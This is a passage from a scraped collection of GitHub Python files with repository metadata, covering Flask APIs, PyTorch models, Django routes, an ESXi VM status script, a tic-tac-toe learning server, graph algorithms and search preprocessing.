proc.kill()\n","repo_name":"maany/flux-play","sub_path":"scripts/flux_config.py","file_name":"flux_config.py","file_ext":"py","file_size_in_byte":13900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28594965650","text":"from flask_restx import Namespace, Resource, fields\nfrom flask import current_app\n\nendpoint = Namespace(\n 'data-formats-endpoint', description='Data formats related api endpoints'\n)\n\ndata_formats_fields = endpoint.model(\n 'DataFormats', {'data_formats': fields.List(fields.String)}\n)\n\n\n@endpoint.route('/')\n@endpoint.route('')\nclass DataFormats(Resource):\n @endpoint.doc(\n description='List of a allowed data formats',\n responses={400: 'Bad request', 404: 'Not Found',},\n )\n @endpoint.response(200, 'Success - Data Formats fetched', data_formats_fields)\n def get(self):\n return current_app.config['DATA_FORMAT_FILE_EXTENSIONS']\n","repo_name":"ikennaokpala/flask-restful-api-example","sub_path":"src/main/controllers/v1/data_formats_controller.py","file_name":"data_formats_controller.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23047483490","text":"import torch\r\nimport math\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.autograd import Variable\r\nfrom torch import optim, nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\nimport autoencoder.networks as nets\r\n\r\n# choose device\r\nUSE_CUDA = torch.cuda.is_available()\r\nif not USE_CUDA:\r\n DEVICE = torch.device('cpu')\r\nelse:\r\n DEVICE = torch.device('cuda:0')\r\nprint(\"CUDA:\", USE_CUDA, DEVICE)\r\n\r\n# the main model to do main process:\r\n# including training, testing, evaluating\r\nclass Model:\r\n def __init__(self, hidden, learning_rate, batch_size, n_time, n_cnt):\r\n self.batch_size = batch_size\r\n self.net = nets.AutoEncoder(hidden)\r\n self.net.to(DEVICE)\r\n self.opt = optim.SGD(self.net.parameters(), learning_rate, momentum=0.9, weight_decay=0.04) # for fine-tone\r\n self.feature_size = hidden[0] # number of features\r\n self.res = np.zeros((n_time, n_cnt, hidden[0]))\r\n\r\n def fill_res(self, tids, cids, outputs):\r\n for i in range(tids.shape[0]):\r\n self.res[tids[i], cids[i]] = outputs[i]\r\n\r\n def run(self, trainset, testset, num_epoch):\r\n torch.autograd.set_detect_anomaly(True) # for debug\r\n train_loader = DataLoader(trainset, self.batch_size, shuffle=True, pin_memory=True)\r\n test_loader = DataLoader(testset, self.batch_size, shuffle=False, pin_memory=True)\r\n for epoch in range(1, num_epoch + 1):\r\n #print \"Epoch %d, at %s\" % (epoch, datetime.now())\r\n trn_tid, trn_cid, out_train = self.train(train_loader, epoch)\r\n tst_tid, tst_cid, out_test = self.test(test_loader)\r\n\r\n torch.save(self.net.state_dict(), '../models/autoencoder')\r\n self.fill_res(trn_tid, trn_cid, out_train)\r\n self.fill_res(tst_tid, tst_cid, out_test)\r\n return self.res\r\n\r\n def train(self, train_loader, epoch):\r\n self.net.train()\r\n tids, cids, outputs = [], [], []\r\n for bid, (tid, cid, feature, mask) in enumerate(train_loader):\r\n feature = Variable(feature.float()).to(DEVICE)\r\n mask = Variable(mask).to(DEVICE)\r\n self.opt.zero_grad()\r\n output = self.net(feature)\r\n loss = F.mse_loss(output * mask, feature * mask) # masked parts do not count\r\n\r\n loss.backward()\r\n self.opt.step()\r\n\r\n tids.append(tid.cpu().data.numpy())\r\n cids.append(cid.cpu().data.numpy())\r\n outputs.append(output.cpu().data.numpy())\r\n\r\n tids, cids, outputs = np.concatenate(tids), np.concatenate(cids), np.concatenate(outputs)\r\n print(\"Epoch {}, train end. loss: {}\".format(epoch, loss.cpu().data))\r\n return tids, cids, outputs\r\n\r\n def test(self, test_loader):\r\n self.net.eval()\r\n\r\n rmse = []\r\n tids, cids, outputs = [], [], []\r\n for bid, (tid, cid, feature, mask) in enumerate(test_loader):\r\n features = Variable(feature.float()).to(DEVICE)\r\n masks = Variable(mask).to(DEVICE)\r\n output = self.net(features)\r\n rmse.append(np.sum(((output * masks).cpu().data.numpy() - (features * masks).cpu().data.numpy())**2)**0.5) # masked parts do not count\r\n\r\n tids.append(tid.cpu().data.numpy())\r\n cids.append(cid.cpu().data.numpy())\r\n outputs.append(output.cpu().data.numpy())\r\n\r\n tids, cids, outputs = np.concatenate(tids), np.concatenate(cids), np.concatenate(outputs)\r\n rmse = math.sqrt(sum(rmse) / len(test_loader))\r\n\r\n print(\" Test RMSE = %f\" % rmse)\r\n return tids, cids, outputs","repo_name":"styxsys0927/DA-and-DL-Spring2021","sub_path":"autoencoder/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6970566681","text":"from django.conf.urls import url, include\nfrom . import views\n\n# from django.contrib import admin\n\nfrom .views import get_person, get_unit, get_unit_link, get_unit_name, get_unit_regtree, get_unit_globtree\n\nurlpatterns = [\n url(r'^$', views.post_list, name='post_list'),\n # url(r'^admin/', admin.site.urls),\n \n # person\n url(r'^wiwo/person/(?Pu[0-9]{7})/$', get_person),\n # microviews person\n # unit\n url(r'^wiwo/unit/(?P5[0-9]{7})/$', get_unit, name=\"unit\"),\n # microviews unit\n url(r'^wiwo/unit/(?P5[0-9]{7})/link/$', get_unit_link, name=\"unitlink\"),\n url(r'^wiwo/unit/(?P5[0-9]{7})/name/$', get_unit_name, name=\"unitname\"),\n url(r'^wiwo/unit/(?P5[0-9]{7})/regtree/$', get_unit_regtree, name=\"regtree\"),\n url(r'^wiwo/unit/(?P5[0-9]{7})/globtree/$', get_unit_globtree, name=\"globtree\"),\n # url(r'^wiwo/unit/(?P5[0-9]{7})/children/$', get_unit_children)\n]","repo_name":"spereverde/django-kuleuven","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39484957144","text":"from sysu_dataset import SYSU\n\nimport numpy as np\nimport scipy\nimport itertools\nimport cv2\n\nimport torch\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transforms\n\nfrom config import *\n\n\nvox_size=54\nall_tups = np.array(list(itertools.product(range(vox_size), repeat=2)))\nrot_array = np.arange(vox_size*vox_size).reshape([vox_size,vox_size])\nK = 5\nT = 10\n\nclass SYSUdataset(Dataset):\n def __init__(self, test=False, full_train=False):\n # Underlying dataset and features\n self.dataset = SYSU()\n\n # What to return\n self.images = DATA_IMAGES\n self.images_3D = DATA_IMAGES_3D\n self.op_flow = DATA_OP_FLOW\n self.op_flow_2D = DATA_OP_FLOW_2D\n self.single_feature = DATA_SINGLE_FEAT\n self.augmentation = DATA_AUGMENTATION\n\n # Train, validation, test split\n self.train = full_train\n if test:\n self.vid_ids = self.dataset.get_splits(SPLIT_NUMBER)[1]\n else:\n self.vid_ids = self.dataset.get_splits(SPLIT_NUMBER)[0]\n\n def __len__(self):\n return len(self.vid_ids)\n\n def image_transforms(self, numpy_imgs):\n ''' Transformations on a list of images\n\n Returns\n -------\n images : Torch Tensor\n Stacked tensor of all images with the transformations applied\n '''\n\n # Get random parameters to apply same transformation to all images in list\n color_jitter = transforms.ColorJitter.get_params(.25,.25,.25,.25)\n rotation_param = transforms.RandomRotation.get_params((-15,15))\n crop_params = None\n\n # Apply transformations\n images = []\n for numpy_img in numpy_imgs:\n i = transforms.functional.to_pil_image(numpy_img)\n i = transforms.functional.resize(i, (224,224))\n if self.train:\n i = color_jitter(i)\n i = transforms.functional.rotate(i, rotation_param)\n i = transforms.functional.to_tensor(i)\n i = transforms.functional.normalize(i, mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n images.append(i)\n return torch.stack(images)\n\n\n\n\n def op_flow_transforms(self, op_flow):\n ''' Transformations on a tensor of optical flow voxel grids\n\n Parameters\n ----------\n op_flow : ndarray\n\n Returns\n -------\n op_flow : Torch Tensor\n A torch tensor of an optical flow voxel grid with the\n transformations (rotation, scale, translation) applied to it\n '''\n def translate(op_flow):\n # op_flow[:,0::3,:,:,:] ---> x axis vectors\n # op_flow = scipy.ndimage.interpolation.shift(op_flow, [0,0,x_move,y_move,z_move], cval=0, order=0) # Slower alternative\n # Get amount to shift\n max_shift = int(op_flow.shape[2] * 0.10)\n x_move, y_move, z_move = np.random.randint(-max_shift, max_shift, 3)\n\n # Translate values\n if x_move > 0:\n op_flow[:,:,x_move:,:,:] = op_flow[:,:,:-x_move,:,:]\n op_flow[:,:,:x_move,:,:] = 0\n elif x_move < 0:\n op_flow[:,:,:x_move,:,:] = op_flow[:,:,-x_move:,:,:]\n op_flow[:,:,x_move:,:,:] = 0\n if y_move > 0:\n op_flow[:,:,:,y_move:,:] = op_flow[:,:,:,:-y_move,:]\n op_flow[:,:,:,:y_move,:] = 0\n elif y_move < 0:\n op_flow[:,:,:,:y_move,:] = op_flow[:,:,:,-y_move:,:]\n op_flow[:,:,:,y_move:,:] = 0\n if z_move > 0:\n op_flow[:,:,:,:,z_move:] = op_flow[:,:,:,:,:-z_move]\n op_flow[:,:,:,:,:z_move] = 0\n elif z_move < 0:\n op_flow[:,:,:,:,:z_move] = op_flow[:,:,:,:,-z_move:]\n op_flow[:,:,:,:,z_move:] = 0\n return op_flow\n\n\n def rotate(op_flow):\n ''' Rotate an optical flow tensor a random amount about the y axis '''\n # Get angle\n angle = np.random.randint(-45, 45)\n\n # Rotate positions\n rot_mat = scipy.ndimage.interpolation.rotate(rot_array, angle, (0,1), reshape=False, order=0)\n op_flow_new = np.zeros(op_flow.shape, dtype=np.float32)\n tup = all_tups[rot_mat]\n op_flow_new = op_flow[:,:,tup[:, :, 0],:,tup[:, :, 1]].transpose(2,3,0,4,1)\n\n # Rotate flow vectors\n cos = np.cos(np.radians(-angle))\n sin = np.sin(np.radians(-angle))\n x_copy = op_flow_new[:,0].copy()\n z_copy = op_flow_new[:,2].copy()\n op_flow_new[:,0] = x_copy * cos + z_copy * sin\n op_flow_new[:,2] = x_copy * -sin + z_copy * cos\n\n return op_flow_new\n\n\n def scale(op_flow):\n return op_flow\n\n # import datetime as dt\n if self.train:\n op_flow = translate(op_flow)\n op_flow = rotate(op_flow)\n\n return torch.from_numpy(op_flow)\n\n\n\n\n def get_3D_op_flow(self, vid_id):\n # Load the data\n feat_values = np.load(\"{}/{:05}.npy\".format(CACHE_3D_VOX_FLOW_SYSU, vid_id))\n feat_nonzero = np.load(\"{}/{:05}.nonzeros.npy\".format(CACHE_3D_VOX_FLOW_SYSU, vid_id))\n feat_shape = np.load(\"{}/{:05}.shape.npy\".format(CACHE_3D_VOX_FLOW_SYSU, vid_id))\n\n # Rebuild the feature from the saved data\n feature = np.zeros(feat_shape, np.float32)\n feature[tuple(feat_nonzero)] = feat_values\n\n return feature\n\n\n\n\n def __getitem__(self, idx):\n vid_id = self.vid_ids[idx]\n to_return = []\n\n # Images\n if self.images:\n images = np.load('{}/{:05}.npy'.format(CACHE_2D_IMAGES_SYSU, vid_id))\n images = self.image_transforms(images)\n to_return.append(images)\n\n # Optical flow 3D\n if self.op_flow:\n op_flow = self.get_3D_op_flow(vid_id)\n op_flow = self.op_flow_transforms(op_flow)\n to_return.append(op_flow)\n\n # Labels\n to_return.append(self.dataset.get_label(vid_id))\n\n return to_return\n\n\n\n\n\ndef get_train_loader():\n dataset = SYSUdataset(full_train=True)\n return torch.utils.data.DataLoader(dataset, batch_size=DATA_BATCH_SIZE,\n shuffle=True, num_workers=NUM_WORKERS,\n pin_memory=True)\n\n\n\ndef get_test_loader():\n dataset = SYSUdataset(test=True)\n return torch.utils.data.DataLoader(dataset, batch_size=DATA_BATCH_SIZE,\n shuffle=False, num_workers=NUM_WORKERS,\n pin_memory=True)\n","repo_name":"mpeven/ntu_rgb","sub_path":"datasets_sysu.py","file_name":"datasets_sysu.py","file_ext":"py","file_size_in_byte":6646,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"76"} +{"seq_id":"12090290355","text":"from flask import Flask, jsonify, make_response, request, abort\r\nfrom flask_cors import CORS, cross_origin\r\nfrom training import Agent,TicTacToeGame,demo_game_stats\r\ngameConfig = {\r\n 'level' : 'easy',\r\n}\r\napp = Flask(__name__)\r\nCORS(app)\r\n\r\n\r\n@app.route('/new-game', methods=['POST'])\r\ndef configNewGame():\r\n global agent\r\n if not request.json:\r\n abort(400)\r\n print(request.json)\r\n gameConfig['level'] = request.json['level']\r\n \r\n if(gameConfig['level'] == 'Easy'):\r\n agent = Agent(TicTacToeGame, epsilon=0.1, alpha=1.0)\r\n agent.learn_game(1000)\r\n print(\"After 1000 learning games:\")\r\n demo_game_stats(agent)\r\n agent.round_V()\r\n agent.save_v_table()\r\n return jsonify({'success': True}), 201\r\n elif(gameConfig['level'] == 'Medium'):\r\n agent = Agent(TicTacToeGame, epsilon=0.1, alpha=1.0)\r\n agent.learn_game(5000)\r\n print(\"After 5000 learning games:\")\r\n demo_game_stats(agent)\r\n agent.round_V()\r\n agent.save_v_table()\r\n return jsonify({'success': True}), 201\r\n elif(gameConfig['level'] == 'Impossible'):\r\n agent = Agent(TicTacToeGame, epsilon=0.1, alpha=1.0)\r\n agent.learn_game(30000)\r\n print(\"After 30000 learning games:\")\r\n demo_game_stats(agent)\r\n agent.round_V()\r\n agent.save_v_table()\r\n return jsonify({'success': True}), 201\r\n\r\n@app.route('/play-game', methods=['POST'])\r\ndef bot_turn():\r\n if not request.json:\r\n abort(400)\r\n board, turn = request.json['board'], request.json['turn']\r\n demo_game_stats(agent)\r\n if ' ' in board:\r\n game = agent.NewGame()\r\n game.state = ''.join(board)\r\n if turn == 'X':\r\n game.player = 'O'\r\n if turn == 'O':\r\n game.player == 'X'\r\n move = agent.play_select_move(game)\r\n board = list(move)\r\n print(board)\r\n return jsonify({'board': board, 'turn':game.player,'success': True}), 201\r\n else:\r\n print(board)\r\n return jsonify({'board': board, 'success': False}), 201\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n app.run()\r\n","repo_name":"monstertau/tic-tac-toe-rl","sub_path":"tic-tac-toe-rl-backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21410578141","text":"from pyVim import connect\nfrom pyVmomi import vim\nimport sys\n\n# Gets virtual machine from name\ndef getVM(content, name):\n obj = None\n container = content.viewManager.CreateContainerView(\n content.rootFolder, [vim.VirtualMachine], True)\n for c in container.view:\n if name:\n if c.name == name:\n obj = c\n break\n else:\n obj = c\n break\n return obj\n\n# Connect to ESXi\nconnection = connect.ConnectNoSSL(\"192.168.182.132\", 443, \"root\", \"ddos\")\n\ndef isOnline(vmName):\n vm = getVM(connection.content, vmName)\n\n # If VM doesn't exist\n if (vm == None):\n print (\"404\", flush = True)\n return False\n\n if (vm.runtime.powerState == \"poweredOff\"):\n print (\"Off\", flush = True)\n return False\n else:\n print(\"On\", flush = True)\n return True\n\n\n# Run function\nisOnline(sys.argv[1])\n\n# Disconnect from ESXi\nconnect.Disconnect(connection)","repo_name":"nkomarn/ESXi-Panel","sub_path":"isOnline.py","file_name":"isOnline.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29956256220","text":"import heapq\r\ndef prim(idx, v):\r\n visit = [False]*(v+1)\r\n visit[idx] = True\r\n cnt = 1\r\n res = 0\r\n h = []\r\n for target in graph[idx]:\r\n heapq.heappush(h, target)\r\n while h:\r\n cost, a = heapq.heappop(h)\r\n if not visit[a]:\r\n visit[a] = True\r\n cnt += 1\r\n res += cost\r\n for target in graph[a]:\r\n heapq.heappush(h, target)\r\n if cnt == v:\r\n return res\r\n return 0\r\n\r\nV, E = map(int,input().split())\r\ngraph = [[] for _ in range(V+1)]\r\nfor i in range(E):\r\n a, b, cost = map(int,input().split())\r\n graph[a].append((cost,b))\r\n graph[b].append((cost,a))\r\nprint(prim(1,V))","repo_name":"sururuu/TIL","sub_path":"Baekjoon_Algorithm/1197_최소 스패닝 트리_sol2.py","file_name":"1197_최소 스패닝 트리_sol2.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30628861128","text":"import sqlite3\n\nconn = sqlite3.connect('my_friends.db');\nc = conn.cursor();\n\nc.execute('CREATE TABLE friends(first_name TEXT, last_name TEXT, closeness INT)');\n\ndata = ('Perry', 'Kid', 7);\nquery = \"INSERT INTO friends VALUES(?,?,?)\";\nc.execute(query, data);\n\npeople = [\n ('Jennifer', 'Al', 4),\n ('Daniel', 'Boom', 6),\n ('Cat', 'Zee', 2),\n ('James', 'Mid', 8),\n]\n\nc.executemany(query, people);\n\nc.execute('SELECT * FROM friends;');\n\n# Iterate over cursor\nfor result in c:\n print(result);\n\n# fetch all the results\npeople_list = c.fetchall();\nprint(people_list);\n\n# fetch only first one result\nc.execute('SELECT * FROM friends WHERE first_name = \"Perry\";');\nprint(c.fetchone());\n\nc.execute(\"SELECT * FROM friends WHERE closeness > 5\");\nprint(c.fetchall());\n\nconn.commit();\nconn.close();","repo_name":"ptyadana/Python-Projects-Dojo","sub_path":"02.Modern Python 3 Bootcamp - CS/35.Python + SQL/friends/friends.py","file_name":"friends.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"76"} +{"seq_id":"13454365143","text":"#!python\n\"\"\"\nA modification of traditional Game of Life such that each cell has randomly\ninitiated probabilities.\n\nIt's possible to do Markov, but the probabilities need to be normalized\n against each other and stored in a temporary array. Then the central cell\n will make it flip along this weights and the chosen cell will turn on in\n the next round. In this model the probabilities of each cell never change,\n and the cell that is 'alive' or 'dead' must be initialized up front. In\n other words, there are only ever n agents in the simulation at one time,\n moving from cell to cell.\n\n\"\"\"\nimport random\nimport sys\n\nfrom settings import height, width\nfrom tradmodel import tradModel\n\n\nclass markovModelNormalized(tradModel):\n\n def __init__(self, grid_model, next_grid_model):\n self.grid_model = grid_model\n self.next_grid_model = next_grid_model\n\n def randomize(self, grid, width, height):\n for i in range(0, height):\n for j in range(0, width):\n rand_val = random.random()\n if rand_val > 0.9:\n grid[i][j] = {'On': 1, 'rand_val': rand_val}\n else:\n grid[i][j] = {'On': 0, 'rand_val': rand_val}\n self.grid_model = grid\n\n def next_gen(self):\n alive_cells = set()\n for i in range(0, height):\n for j in range(0, width):\n if self.grid_model[i][j]['On'] == 1 and (\n i, j) not in alive_cells:\n coordinates, weights = self.markov_logic(i, j)\n next_cell_x, next_cell_y = self.outcome_logic(i, j,\n coordinates, weights)\n alive_cells.add((next_cell_x, next_cell_y))\n temp = self.grid_model\n self.grid_model = self.next_grid_model\n self.next_grid_model = temp\n\n def markov_logic(self, i, j):\n # ex. {(x, y): 0.50}\n probabilities = self.count_neighbor_probabilities((i, j))\n # not allowing you to choose cells that are off the grid:\n probabilities = {k: v for k, v in probabilities.items() if\n (k[0] >= 0 and k[0] <= width) and (\n k[1] >= 0 and k[1] <= height)}\n cell_probabilities_totaled = sum(v for v in probabilities.values())\n coords_w_normalized_weights = {k: v / cell_probabilities_totaled for\n k, v in probabilities.items()}\n coordinates = list(coords_w_normalized_weights.keys())\n weights = list(coords_w_normalized_weights.values())\n return coordinates, weights\n\n def outcome_logic(self, i, j, coordinates, weights):\n next_cell_x, next_cell_y = random.choices(coordinates, weights)[0]\n self.grid_model[i][j]['On'] = 0\n self.next_grid_model[next_cell_x][next_cell_y]['On'] = 1\n return next_cell_x, next_cell_y\n\n def count_neighbor_probabilities(self, cell_coord):\n row, col = cell_coord\n cell_prob_dict = {}\n neighbor_cells = [(row - 1, col - 0), (row - 1, col - 1),\n (row - 1, col + 1), (row - 0, col - 1), (row - 0, col + 1),\n (row + 1, col + 0), (row + 1, col - 1), (row + 1, col + 1)]\n # adds probability if cell is on the grid and unoccupied\n for x, y in neighbor_cells:\n try:\n if not self.next_grid_model[x][y]['On']:\n cell_prob_dict[(x, y)] = self.grid_model[x][y]['rand_val']\n except IndexError: # hit edge of the grid\n continue\n return cell_prob_dict\n\n def load_pattern(self, pattern, x_offset=0, y_offset=0):\n global grid_model\n\n # init to clear the grid:\n for i in range(0, height):\n for j in range(0, width):\n rand_val = random.random()\n grid_model[i][j] = self.cell(On=0, rand_val=rand_val)\n\n # this is offsetting by y amount, to apply the pattern wherever you\n # like.\n j = y_offset\n\n for row in pattern:\n # offset by x amount.\n i = x_offset\n for value in row:\n rand_val = random.random()\n grid_model[i][j] = self.cell(On=value, rand_val=rand_val)\n i = i + 1\n j = j + 1\n","repo_name":"Travis42/conway-experiment","sub_path":"markov_model.py","file_name":"markov_model.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19803028827","text":"import tqdm\nfrom haystack import Document\nfrom haystack.utils import convert_files_to_docs\nfrom sentence_transformers import SentenceTransformer, util\nfrom setfit import SetFitModel\nimport re\n\nfrom killer_bots.search_engine.utils import change_extentions_to_txt\n\n\ndef clean_wiki_text(text: str) -> str:\n # get rid of multiple new lines\n while \"\\n\\n\" in text:\n text = text.replace(\"\\n\\n\", \"\\n\")\n\n # get rid of multiple spaces\n while \" \" in text:\n text = text.replace(\" \", \" \")\n\n # add paragraphs (identified by wiki section title which is always in format \"==Some Title==\")\n text = text.replace(\"\\n==\", \"\\n\\n\\n==\")\n\n # remove empty paragrahps\n text = re.sub(r\"(==.*==\\n\\n\\n)\", \"\", text)\n\n # remove multiple dashes\n text = re.sub(r\"#+ +\", \"\", text)\n text = re.sub(r\" +#+\", \"\", text)\n\n text = re.sub(r\"\\n +\\n\", \"\\n\", text)\n\n # remove all links from markdown text\n text = re.sub(r\"\\[(.*?)\\]\\(.*?\\)\", r\"\\1\", text)\n\n # remove all images from markdown text\n text = re.sub(r\"!\\[(.+)\\]\\(.+\\)\", \"\", text)\n\n return text.strip()\n\n\ndef get_docs_text(docs):\n return '\\n'.join([clean_wiki_text(doc.content) for doc in docs])\n\n\ndef join_docs(docs):\n if set([doc.meta[\"name\"] for doc in docs]) == 1:\n print(docs)\n raise Exception(\"All docs must have the same name\")\n return Document(content=get_docs_text(docs), meta=docs[0].meta)\n\n\nclass PreprocessDocs:\n def __init__(self):\n self.similarity_model = SentenceTransformer(\"all-MiniLM-L6-v2\")\n self.is_title_model = SetFitModel.from_pretrained(\"AlekseyKorshuk/is-title-setfit\", device=\"cuda\")\n self.small_threshold = 0.1\n self.threshold = 0.35\n self.next_threshold = 0.4\n\n def get_score(self, text1, text2):\n text1 = clean_wiki_text(text1)\n text2 = clean_wiki_text(text2)\n embeddings = self.similarity_model.encode([text1, text2], convert_to_tensor=True)\n cosine_scores = util.cos_sim(embeddings, embeddings)\n # if \"technical debt\" in text1 or \"technical debt\" in text2:\n # print(\"#\" * 100)\n # print(text1)\n # print(text2)\n # print(cosine_scores[0][1])\n # input()\n\n return cosine_scores[0][1]\n\n def is_title(self, text):\n return self.is_title_model([clean_wiki_text(text)])[0] == 1\n\n def split_last_titles(self, docs):\n last_docs = []\n docs = docs.copy()\n doc = docs[-1]\n while self.is_title(doc.content):\n last_docs.append(doc)\n docs.pop()\n try:\n doc = docs[-1]\n except:\n # print(last_docs)\n break\n last_docs.reverse()\n return docs, last_docs\n\n def __call__(self, docs):\n prepared_docs = []\n current_docs = [docs[0]]\n for i, doc in tqdm.tqdm(enumerate(docs[1:]), total=len(docs[1:]), desc=\"Preprocessing docs\"):\n if doc.meta['name'] != current_docs[-1].meta['name']:\n prepared_docs.append(join_docs(current_docs))\n current_docs = [doc]\n continue\n if len(current_docs) == 0:\n import pdb;\n pdb.set_trace()\n score = self.get_score(get_docs_text(current_docs), doc.content)\n add_flag = False\n if score > self.threshold and current_docs[-1].meta['name'] == doc.meta['name']:\n add_flag = True\n elif self.is_title(get_docs_text(current_docs)) and score > self.small_threshold:\n add_flag = True\n else:\n next_score = self.get_score(\n get_docs_text(current_docs) + '\\n' + doc.content,\n docs[i + 2].content\n )\n if next_score > self.next_threshold and current_docs[-1].meta['name'] == docs[i + 2].meta['name']:\n add_flag = True\n if add_flag:\n current_docs.append(doc)\n if i == len(docs) - 2:\n # if \"technical debt\" in get_docs_text(current_docs):\n # print(\"!\" * 100)\n # print(get_docs_text(current_docs))\n # print(\"!\" * 100)\n prepared_docs.append(join_docs(current_docs))\n else:\n current_docs, last_docs = self.split_last_titles(current_docs)\n if len(current_docs) > 0:\n # if \"technical debt\" in get_docs_text(current_docs):\n # print(\"!\" * 100)\n # print(get_docs_text(current_docs))\n # print(\"!\" * 100)\n prepared_docs.append(join_docs(current_docs))\n current_docs = last_docs + [doc]\n return prepared_docs\n\n\ndef preprocess_docs(docs):\n return PreprocessDocs()(docs)\n\n\nclass PreprocessDocsFast:\n def __init__(self):\n pass\n\n def is_title(self, text):\n return text.startswith(\"#\")\n\n def is_all_title(self, docs):\n return all([self.is_title(doc.content) for doc in docs])\n\n def __call__(self, docs):\n prepared_docs = []\n for i, doc in enumerate(docs):\n doc.meta[\"id\"] = i\n current_docs = [docs[0]]\n for i, doc in tqdm.tqdm(enumerate(docs[1:]), total=len(docs[1:]), desc=\"Preprocessing docs\"):\n is_title = self.is_title(doc.content)\n if is_title:\n if not self.is_all_title(current_docs):\n prepared_docs.append(join_docs(current_docs))\n current_docs = [doc]\n elif len(clean_wiki_text(doc.content)) > 0:\n current_docs.append(doc)\n if len(current_docs) > 0 and not self.is_all_title(current_docs):\n prepared_docs.append(join_docs(current_docs))\n\n prepared_docs = [doc for doc in prepared_docs if str(doc.content).count(\"\\n\") < 5]\n return prepared_docs\n\n\nif __name__ == \"__main__\":\n doc_dir = './killer_bots/bots/code_guru/database/'\n change_extentions_to_txt(doc_dir)\n docs = convert_files_to_docs(dir_path=doc_dir, clean_func=None, split_paragraphs=True)\n preprocessor = PreprocessDocs()\n prepared_docs = preprocessor(docs)\n\n for doc in prepared_docs:\n print(doc)\n print(\"#\" * 100)\n","repo_name":"AlekseyKorshuk/killer-bots","sub_path":"killer_bots/search_engine/preprocess_docs.py","file_name":"preprocess_docs.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42990850","text":"n = int(input())\n\nla, lb = input().split()\nla, lb = int(la), int(lb)\n\nsa, sb = input().split()\nsa, sb = int(sa), int(sb)\n\nif (n < la) or (n > lb) or (n < sa) or (n > sb):\n print(\"impossivel\")\nelse:\n print(\"possivel\")\n","repo_name":"tavaresmat/URI-Problems","sub_path":"1794_lavanderia.py","file_name":"1794_lavanderia.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2750992335","text":"#!/usr/bin/python3\n\"\"\"Starts a web application\"\"\"\nfrom os import environ\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\n@app.route('/maze/', strict_slashes=False)\ndef maze():\n \"\"\"do we really need the python part to make the maze run?\"\"\"\n return render_template('maze.html')\n\n\nif __name__ == \"__main__\":\n \"\"\" Main Function \"\"\"\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"rkbrian/holberton_presentation","sub_path":"maze_generator/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70084073526","text":"# Crea un diccionario que represente los juegos de una consola, donde las\n# claves son los nombres de los juegos y los valores son las puntuaciones\n# correspondientes. Solicita al usuario el nombre de un juego y luego su\n# puntuación, si el juego no existe agregarlo y si existe actualizar su puntuación\n\ndiccionario = {\"Mario Bros\" : 10, \"Battlefield\" : 8, \"Valorant\" : 15}\n\nnombre_ingresado = input(\"Ingrese el nombre del juego\")\npuntuacion_ingresada_txt = input(\"Ingrese la puntuacion del juego\")\npuntuacion_ingresada_int = int(puntuacion_ingresada_txt)\n\n\n# Se tuvo que hacer con if in, ya que cada vez que se agrega un elemento al diccionario usando for tira error\nif (nombre_ingresado in diccionario): \n diccionario[nombre_ingresado] = puntuacion_ingresada_int\nelse:\n diccionario[nombre_ingresado] = puntuacion_ingresada_int\n\nprint(diccionario)","repo_name":"MarianoAquino6/UTN-First-Semester-Exercises-2023","sub_path":"DICTIONARIES/ejercicio_18.py","file_name":"ejercicio_18.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38297300545","text":"import os\nfrom transformers.data.processors.utils import DataProcessor, InputExample\nfrom tqdm import tqdm\nimport random\nimport code\n\nclass NatcatProcessor(DataProcessor):\n \"\"\"Processor for the Natcat data set.\"\"\" \n def __init__(self):\n super(NatcatProcessor, self).__init__()\n\n def get_examples(self, filepath):\n \"\"\"See base class.\"\"\"\n \"\"\"\n filepath: the file of article-category pairs \n \"\"\"\n examples = []\n i = 0\n with open(filepath) as fin:\n lines = fin.read().strip().split(\"\\n\")\n for line in tqdm(lines):\n line = line.strip().split(\"\\t\")\n\n pos_cats = line[:1]\n neg_cats = line[len(pos_cats):-1]\n article = line[-1]\n for pos_cat in pos_cats:\n examples.append(InputExample(guid=i, text_a=pos_cat, text_b=article, label='1'))\n i += 1\n for neg_cat in neg_cats:\n examples.append(InputExample(guid=i, text_a=neg_cat, text_b=article, label='0'))\n i += 1\n\n\n return examples \n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"0\", \"1\"]\n\nclass EvalProcessor:\n def __init__(self, 